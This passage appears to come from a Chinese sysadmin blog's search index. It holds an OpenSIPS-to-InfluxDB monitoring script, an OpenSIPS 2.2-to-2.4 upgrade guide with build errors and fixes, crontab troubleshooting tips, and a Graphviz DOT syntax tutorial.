dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.8.8.8 | head -n +1 | tr -s \u0026#34; \u0026#34; | cut -d \u0026#34; \u0026#34; -f 7` MSG=`opensipsctl fifo get_statistics all | grep -E \u0026#34;tm:|shmem:|dialog\u0026#34; | awk -F \u0026#39;:: \u0026#39; \u0026#39;BEGIN{OFS=\u0026#34;=\u0026#34;;ORS=\u0026#34;,\u0026#34;} {print $1,$2}\u0026#39; | sed \u0026#39;s/[-:.]/_/g\u0026#39;` MSG=${MSG:0:${#MSG}-1} echo $MSG influxdb=\u0026#34;http://$CONF_DB_URL/write?db=$CONF_DB_NAME\u0026#34; curl -i -XPOST $influxdb --data-binary \u0026#34;opensips,type=$CONF_OPENSIPS_ROLE,ip=$LOCAL_IP $MSG\u0026#34; shmem:total_size:: 33554432shmem:used_size:: 2910624shmem:real_used_size:: 3722856shmem:max_used_size:: 21963544shmem:free_size:: 29831576shmem:fragments:: 30761core:rcv_requests:: 1625972core:rcv_replies:: 580098core:fwd_requests:: 26146core:fwd_replies:: 0core:drop_requests:: 27core:drop_replies:: 0core:err_requests:: 0core:err_replies:: 0core:bad_URIs_rcvd:: 0core:unsupported_methods:: 0core:bad_msg_hdr:: 0core:timestamp:: 179429net:waiting_udp:: 0net:waiting_tcp:: 0sl:1xx_replies:: 0sl:2xx_replies:: 930643sl:3xx_replies:: 0sl:4xx_replies:: 265459sl:5xx_replies:: 168472sl:6xx_replies:: 0sl:sent_replies:: 1364574sl:sent_err_replies:: 0sl:received_ACKs:: 27tm:received_replies:: 570374tm:relayed_replies:: 402332tm:local_replies:: 155868tm:UAS_transactions:: 181106tm:UAC_transactions:: 71770tm:2xx_transactions:: 117167tm:3xx_transactions:: 0tm:4xx_transactions:: 138052tm:5xx_transactions:: 29tm:6xx_transactions:: 0tm:inuse_transactions:: 2uri:positive checks:: 195024uri:negative_checks:: 0usrloc:registered_users:: 0usrloc:location-users:: 0usrloc:location-contacts:: 0usrloc:location-expires:: 0registrar:max_expires:: 180registrar:max_contacts:: 1registrar:default_expire:: 150registrar:accepted_regs:: 110781registrar:rejected_regs:: 84236dialog:active_dialogs:: 0dialog:early_dialogs:: 0dialog:processed_dialogs:: 150397dialog:expired_dialogs:: 0dialog:failed_dialogs:: 137297dialog:create_sent:: 0dialog:update_sent:: 0dialog:delete_sent:: 0dialog:create_recv:: 0dialog:update_recv:: 0dialog:delete_recv:: 0\n","permalink":"https://wdd.js.org/opensips/ch3/opensips-monitor/","summary":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和回话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网路统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get statistics shmem: 获取共享内存相关信息 opensipsctl fifo get statistics usrloc: 获取 opensipsctl fifo get statistics registrar: 获取注册统计信息 opensipsctl fifo get statistics uri: 获取uri统计信息 opensipsctl fifo get statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.","title":"opensips监控"},{"content":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。\n1. linux2.6.x86_64 conflicts with file from package .linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/italian/errmsg.sys from install of MySQL-server-5.5.28-1.linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/japanese/errmsg.sys from install of MySQL-server-5.5.28-\n解决方案:rpm -qa | grep mysql | xargs rpm -e \u0026ndash;nodeps\n2. my_con.h:29:19: fatal error: mysql.h: No such file or directory my_con.h:29:19: fatal error: mysql.h: No such file or directory\n解决方案:yum install mysql-devel -y\n3. siprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory ERROR3:\nsiprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory #include \u0026lt;uuid/uuid.h\u0026gt;\n解决方案:yum install libuuid-devel -y\n4. regex.so: undefined symbol: debug 数据库迁移 opensips不同的版本,所需要的模块对应的表可能都不同,所以需要迁移数据库。\n迁移数据库需要opensipsdbctl命令,这个命令会根据opensipscrlrc文件链接opensips所使用的数据库。\nopensips的升级有个特点新版本的opensipsdbctl只用用来升级之前版本的opensips。\n从官方文档可以看出 2.2版本的opensips要升级到2.4,中间需要经过2.3。也就是说,你需要用opensips 2.3中的opensipsdbctl将 2.2升级到2.3,然后使用opensips 2.4中的opensipsdbctl将 2.3升级到2.4。\n为了加快升级速度,避免在安装不必要的版本,我构建了两个docker镜像,这两个镜像分别是2.3版本的opensips和2.4版本的opensips。我们可以使用这两个镜像中的opensipsdbctl来升级数据库。\ndocker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 docker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.4.2 先从2.2升级到2.3\ndocker run -it --name opensips --rm ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 bash vim /usr/local/etc/opensipsctlrc opensipsdbctl migrate opensips_old_db opensips_new_db # 下面会让你输入数据库密码, # 下面可能让你输入y/n, 一律输入y # 如果让你选择字符集,则输入 latin1 然后基于老的数据库,创建新的数据库。对于老的数据库,opensipsdbctl并不会改变它的任何字段。\n首先需要配置/usr/local/etc/opensips/opensipsctlrc文件,把mysql相关的配置修改正确。\n有可能升级过后opensips -V 输出的还是老版本的opensips, 这是需要\n排查PATH /usr/local/sbin/ 是不是在 /usr/sbin的前面 重新连接shell, 有可能环境变量还未更新 可执行文件的位置 # 2.x版本的 /usr/local/sbin/ # 1.x 版本的 /usr/sbin 报错 Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/regex.so\u0026gt;: /usr/local/lib64/opensips/modules/regex.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 26, column 13-14: failed to load module regex.so Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/rest_client.so\u0026gt;: /usr/local/lib64/opensips/modules/rest_client.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 57, column 13-14: failed to load module rest_client.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 99, column 20-21: Parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 101, column 20-21: Parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 102, column 20-21: Parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 103, column 20-21: Parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 104, column 20-21: Parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/carrierroute.so\u0026gt;: /usr/local/lib64/opensips/modules/carrierroute.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 146, column 13-14: failed to load module carrierroute.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 147, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 148, column 20-21: Parameter \u0026lt;config_source\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 149, column 19-20: Parameter \u0026lt;use_domain\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 150, column 20-21: Parameter \u0026lt;db_failure_table\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/dialplan.so\u0026gt;: /usr/local/lib64/opensips/modules/dialplan.so: undefined symbol: debug Jul 18 19:37:23 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 161, column 13-14: failed to load module dialplan.so Jul 18 19:37:23 [28181] ERROR:core:set_mod_param_regex: no module matching dialplan found Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 162, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;dialplan\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bare word \u0026lt;uri\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bare word \u0026lt;myself\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 37-39: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 54-55: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: Jul 18 19:37:23 [28181] ERROR:core:main: bad config file (26 errors) Jul 18 19:37:23 [28181] NOTICE:core:main: Exiting.... ","permalink":"https://wdd.js.org/opensips/ch3/centos7-2.4/","summary":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。","title":"opensips centos7 安装与升级"},{"content":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每个多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每个周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9,18 * * 1-5 喝水 每个 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔 15 秒 * * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 为什么 crontab 指定的脚本没有执行? 有以下可能原因\n没有权限执行某个命令 某个命令不在环境变量中,无法找到对应命令 首先你必须测试一下,你的脚本不使用 crontab 能否正常执行。\n大部分 crontab 执行不成功,都是因为环境变量的问题。\n下面写个例子:\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log cd /root sh test.sh ctrontab -e 将 test.sh 加入 crontab 中\n* * * * * sh /root/test.sh centos crontab 的执行日志在/var/log/cron 中,可以查看执行日志。\n我的机器是树莓派,没有这个文件,但是我是把执行输出到/root/test.log 中的,可以查看这个文件\n可以看到虽然输入了事件,但是并没有输出 opensips 的版本\nMon 1 Jul 13:04:01 BST 2019 Mon 1 Jul 13:05:01 BST 2019 将$PATH 也加入输出,发现Mon 1 Jul 13:10:01 BST 2019 /usr/bin:/bin,而 opensips 这个命令是位于/usr/local/sbin 下,所以无法找到执行文件,当然无法执行\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 那还不好办吗?\n在当前工作目录执行 echo $PATH, 然后在脚本里设置一个环境变量就能搞定\n#!/bin/bash PATH=\u0026#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0026#39; now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 也可以使用 journalctl -t CROND 查看 crond 的日志\n检查 crontab 是否运行 systemctl status crond systemctl restart crond 在 alpine 中执行 crontab alpine 中没有 systemctl, 需要启动 crond 的守护进程,否则程序定时任务是不会执行的\n#!/bin/sh # start cron /usr/sbin/crond -f -l 8 ","permalink":"https://wdd.js.org/shell/crontab-tips/","summary":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每个多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每个周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9,18 * * 1-5 喝水 每个 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1.","title":"长太息以掩涕兮,哀crontab之难用"},{"content":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显然出图片 digraph用来标记有向图,里面只用用-\u0026gt; 不能用\u0026ndash;, 否则无法显然出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。\ngraph easy{ a [shape=parallelogram] b [shape=egg] a--b; } 还有什么布局姿势? 默认图是从上到下画的,你可以用rankdir = LR来让图从左往右绘制\ndigraph easy { rankdir = LR; a -\u0026gt; b; } 当然,还有其他姿势\nrankdir\nLR 从左往右布局 RL 从右往左布局 TB 从上下往下布局(默认) BT 从下往上布局 多来几个圆,看看效果 digraph easy { rankdir = LR; a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 怎么加注释? 支持两种注释\n// /**/ digraph easy { a -\u0026gt; b; // 从a到b b -\u0026gt; c; /* 从b到c */ } 句尾要不要加分号? 答:分号不是必须的,你随意\n如何起个别名? 不起别名的时候,名字太长,引用不方便。\ngraph easy{ \u0026#34;直到确定,手的温度来自你心里\u0026#34;--\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;; \u0026#34;这一刻,也终于勇敢说爱你\u0026#34; -- \u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34; } 起个别名,快速引用\ngraph easy{ a [label=\u0026#34;直到确定,手的温度来自你心里\u0026#34;]; b [label=\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;]; c [label=\u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34;] a -- b; b -- c; } 统一设置点线的样式 digraph easy{ rankdir = LR; node [color=Red,shape=egg] edge [color=Pink, style=dashed] a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 加点颜色 digraph easy{ bgcolor=Pink; b [style=filled, fillcolor=yellow, center=true] a-\u0026gt;b; } 禁用关键词 下面的关键词,不区分大小写,不能作为节点的名字,如果你用了,你的图就画不出来\nnode, edge, graph, digraph, subgraph, and strict\n下面的写法会导致绘图失败\ngraph a { node -- edge } 但是关键词可以作为Label\ngraph a { a [label=\u0026#34;node\u0026#34;] b [label=\u0026#34;edge\u0026#34;] a -\u0026gt; b } 快捷方式 - 串起来 # 方式1 两点之间一个一个连接 digraph { a -\u0026gt; b; b -\u0026gt; c; c -\u0026gt; d; } # 方式2 直接串起来所有的点 digraph { a -\u0026gt; b -\u0026gt; c -\u0026gt; d; } # 方式3 直接串起来所有的点, 也可换行 digraph { a-\u0026gt;b -\u0026gt;c -\u0026gt;d -\u0026gt;e; } 对比发现,直接串起来的话,更简单,速度更快。对于无向图 也可以用 a -- b -- c -- d 的方式串起来。\n快捷方式 - 大括号 对于上面的图,也有两种绘制方法。用大括号的方式明显更好呀! 😺\n# 方式1 digraph { a -\u0026gt; b; a -\u0026gt; c; a -\u0026gt; d; b -\u0026gt; z; c -\u0026gt; z; d -\u0026gt; z; } # 方式2 digraph { a -\u0026gt; {b;c;d} {b;c;d} -\u0026gt; z } 数据结构 UML 怎么画呀? 比如说下面的typescript数据结构\ninterface Man { name: string; age: number; isAdmin: boolean } interface Phone { id: number; type: string; } 注意:node [shape=\u0026ldquo;record\u0026rdquo;]\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|age:number|isAdmin:boolean}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|type:string}\u0026#34;] } 数据结构之间的关系如何表示? 锚点 例如Man类型有个字段phone, 是Phone类型的\ninterface Man { name: string; age: number; isAdmin: boolean; phone: Phone } interface Phone { id: number; type: string; } interface Plain { key1:aaa; key2:bbb; } 注意lable里面的内容,其中\u0026lt;\u0026gt;这个符号可以理解为一个锚点。\nman:age-\u0026gt;plain:key1 这个意思是man的age锚点连接到plain的key1锚点。\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|\u0026lt;age\u0026gt;age:number|isAdmin:boolean|\u0026lt;phone\u0026gt;phone:Phone}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|\u0026lt;type\u0026gt;type:string}\u0026#34;] plain[label=\u0026#34;{Plain|\u0026lt;key1\u0026gt;key1:aaa|key2:bbb}\u0026#34;] man:phone-\u0026gt;phone man:age-\u0026gt;plain:key1 [color=\u0026#34;red\u0026#34;] phone:type-\u0026gt;plain:key1 } hash 链表 digraph { rankdir=LR; node [shape=\u0026#34;record\u0026#34;,height=.1, width=.1]; node0 [label = \u0026#34;\u0026lt;f0\u0026gt;a |\u0026lt;f1\u0026gt;b |\u0026lt;f2\u0026gt;c|\u0026#34;, height=2.5]; node1 [label = \u0026#34;{\u0026lt;n\u0026gt; a1 | a2 | a3 | a4 |\u0026lt;p\u0026gt; }\u0026#34;]; node2 [label = \u0026#34;{\u0026lt;n\u0026gt; b1 | b2 |\u0026lt;p\u0026gt; }\u0026#34;]; node3 [label = \u0026#34;{\u0026lt;n\u0026gt; c1 | c2 |\u0026lt;p\u0026gt; }\u0026#34;]; node0:f0-\u0026gt;node1:n [headlabel=\u0026#34;a link\u0026#34;] node0:f1-\u0026gt;node2:n [headlabel=\u0026#34;b link\u0026#34;] node0:f2-\u0026gt;node3:n [headlabel=\u0026#34;c link\u0026#34;] } label {}的作用 digraph { node [shape=\u0026#34;record\u0026#34;]; node0 [label = \u0026#34;0|a|b|c|d|e\u0026#34;,height=2.5]; node1 [label = \u0026#34;{1|a|b|c|d|e}\u0026#34;,height=2.5]; } 对于record而言\n有{} , 则属性作用于整体 无{}, 则属性作用于个体 分组子图 subgraph 关键词标记分组 组名必需以cluster开头 graph { rankdir=LR node [shape=\u0026#34;box\u0026#34;] subgraph cluster_1 { label=\u0026#34;network1\u0026#34;; bgcolor=\u0026#34;mintcream\u0026#34;; host_11 [label=\u0026#34;router\u0026#34;]; host_12; host_13; } subgraph cluster_2 { label=\u0026#34;network2\u0026#34;; bgcolor=\u0026#34;mintcream\u0026#34;; host_21 [label=\u0026#34;router\u0026#34;]; host_22; host_23; } host_12--host_11; host_13--host_11; host_11--host_21; host_22--host_21; host_23--host_21; } 流程图 二等车厢座位示意图 digraph{ label=\u0026#34;二等车厢座位示意图\u0026#34; node [shape=record]; struct3 [ shape=record, label=\u0026#34;车窗|{ {01A|01B|01C}| {02A|02B|02C}| {03A|03B|03C} } |过道|{ {01D|01F}| {02D|02F}| {03D|03F} }|车窗\u0026#34; ]; } Node Port 可以使用nodePort来调整目标的连接点, node Port可以理解为地图上的东南西北。\nn | w\u0026lt;----+----\u0026gt; e | s digraph { rankdir=LR node [shape=box] a-\u0026gt;b:n [label=n] a-\u0026gt;b:ne [label=ne] a-\u0026gt;b:e [label=e] a-\u0026gt;b:se [label=se] a-\u0026gt;b:s [label=s] a-\u0026gt;b:sw [label=sw] a-\u0026gt;b:w [label=w] a-\u0026gt;b:nw [label=nw] } 电磁感应线圈 \u0026lt;\u0026gt;可以用来自定义锚点,锚点可以用来连线。\ndigraph{ node [shape=record]; edge[style=dashed] t [style=filled;fillcolor=gray;label=\u0026#34;\u0026lt;l\u0026gt;N| |||||||\u0026lt;r\u0026gt;S\u0026#34;] t:l-\u0026gt;t:r [color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] } 三体纠缠 digraph{ nodesep=.8 ranksep=1 rankdir=TD node[shape=circle] edge [style=dashed] a[style=filled;fillcolor=red;label=\u0026#34;\u0026#34;;color=red] b[style=filled;fillcolor=red2;label=\u0026#34;\u0026#34;;color=red2] c[style=filled;fillcolor=red4;label=\u0026#34;\u0026#34;;color=red4] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] 